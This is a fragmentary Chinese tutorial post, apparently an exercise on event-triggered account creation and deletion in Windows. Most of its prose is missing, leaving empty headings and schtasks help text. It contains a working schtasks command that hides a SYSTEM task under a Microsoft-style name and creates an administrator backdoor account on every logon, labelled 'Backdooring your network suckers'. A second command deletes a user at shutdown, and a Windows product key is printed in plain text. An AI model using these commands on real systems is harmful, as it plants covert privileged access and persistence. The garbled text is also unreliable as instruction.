网络攻防任务二:开机、关机事件触发账户的创建与删除

匿名 (未验证) 提交于 2019-12-02 23:59:01

 

一、

:

1、

2、

 

 

二、

schtasks

schtasksnet user

at.bat

 

xpwin7

Win7YKHFT KW986 GK4PY FDWYH 7TP9F

 

(二)

Schtasks:

 

    

    

 

:

    /Create         

 

    /Delete         

 

    /Query          

 

    /Change         

 

    /Run            

 

    /End            

 

    /ShowSid        

 

    /?              

 

Examples:

    SCHTASKS

    SCHTASKS /?

    SCHTASKS /Run /?

    SCHTASKS /End /?

    SCHTASKS /Create /?

    SCHTASKS /Delete /?

    SCHTASKS /Query  /?

    SCHTASKS /Change /?

    SCHTASKS /ShowSid /?

 

ID4624

schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user cyx cyx /add /y /active:yes >> nul & net localgroup administrators cyx /add >nul & net user cyx /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo"*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"

 

 

 

 

 

 

 

 

 

 

 

 

 

(三)

ID1074

schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user lemon /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"

 

 

 

 

 

 

 

 

 

net user

 

 

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!